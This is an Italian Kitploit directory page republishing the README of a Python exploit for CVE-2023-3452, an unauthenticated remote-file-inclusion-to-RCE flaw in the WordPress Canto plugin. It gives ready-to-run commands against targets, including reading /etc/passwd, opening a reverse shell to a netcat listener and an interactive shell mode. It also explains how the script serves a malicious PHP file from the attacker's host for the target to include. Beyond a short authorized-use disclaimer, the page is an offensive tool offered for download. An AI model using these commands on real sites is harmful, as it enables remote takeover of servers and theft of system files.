Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — CVE-2023-3452 exploit per plugin WordPress Canto RCE, supporto HTTPS incluso | Kitploit
Strumenti/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

CVE-2023-3452 exploit per plugin WordPress Canto RCE, supporto HTTPS incluso

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
16 mesi faNon ancora revisionato
Condividi

CVE-2023-3452 - Plugin Canto per WordPress RCE

Exploit per il Plugin Canto di WordPress (≤ 3.0.4) vulnerabilità RFI. Funziona effettivamente su HTTPS — gli altri PoC pubblici hanno rinunciato all'SSL.

Crediti dove meritano: questa CVE è stata trovata da altri. Ho solo creato una versione che non si blocca sui target HTTPS.

Vulnerability

CVECVE-2023-3452
EDB-ID51826
TypeInclusione Remota di File (RFI) → RCE non autenticata
AffectedPlugin Canto di WordPress < 3.0.5 (≤ 3.0.4)
Disclosed byLeopoldo Angulo (leoanggal1) — 2024-02-27
Location/wp-content/plugins/canto/includes/lib/download.php
Vectorwp_abspath viene usato per includere file PHP senza alcuna validazione — includiamo il nostro da remoto.

Perché questo?

La maggior parte degli exploit per questa CVE si bloccano su HTTPS a causa della verifica SSL. Questo script:

  • Usa verify=False così i target HTTPS funzionano effettivamente
  • Sopprime i fastidiosi avvisi di urllib3
  • Funziona allo stesso modo sia su HTTP che su HTTPS — nessuna configurazione separata necessaria

Requirements

  • Python 3.6+
  • requests

Installation

root@kitploit:~
pip install -r requirements.txt

O semplicemente: pip install requests

Usage

root@kitploit:~
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]

Arguments

OptionDescriptionRequired
-t, --targetURL del target WordPress (HTTP o HTTPS)Yes
-l, --lhostIl tuo IP — il target deve poterlo raggiungere per il payloadYes
-p, --lportPorta del server payload (default: 8888)No
-c, --commandComando da eseguire sul targetNo*
--revshellAvvia una reverse shellNo
--shell-portPorta di ascolto per la reverse shell (default: 4444)No
-i, --interactiveModalità shell interattivaNo
-v, --verboseOutput aggiuntivoNo
--skip-checkSalta il controllo della vulnerabilitàNo

* Nessun comando = esegue id; whoami; hostname come controllo di base

Examples

Comando singolo:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

Leggi un file:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

Reverse shell (esegui prima nc -lvnp 4444):

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

Modalità interattiva:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

Target CTF HTTPS:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

Come funziona

  1. Controllo — Colpisce /wp-content/plugins/canto/readme.txt, analizza la versione (≤ 3.0.4 = vulnerabile)
  2. Payload — Scrive un falso wp-admin/admin.php che esegue il comando tramite system()
  3. Servi — Avvia un server HTTP locale così il target può recuperare il nostro file
  4. Attiva — Invia una richiesta a download.php con wp_abspath=http://LHOST:LPORT in modo che includa il nostro PHP remoto
  5. Esegui — Il loro server esegue il nostro codice, riceviamo l'output

Note di rete

  • Il target deve poter raggiungere la tua macchina su LHOST:LPORT (per HTB/lab, è il tuo IP VPN)
  • Il firewall deve permettere il traffico in entrata sulla porta del payload (-p)

Disclaimer

Solo per test autorizzati e formazione. Toccate solo sistemi su cui siete autorizzati. Qualsiasi altra cosa è illegale.

License

MIT

Scarica lo strumento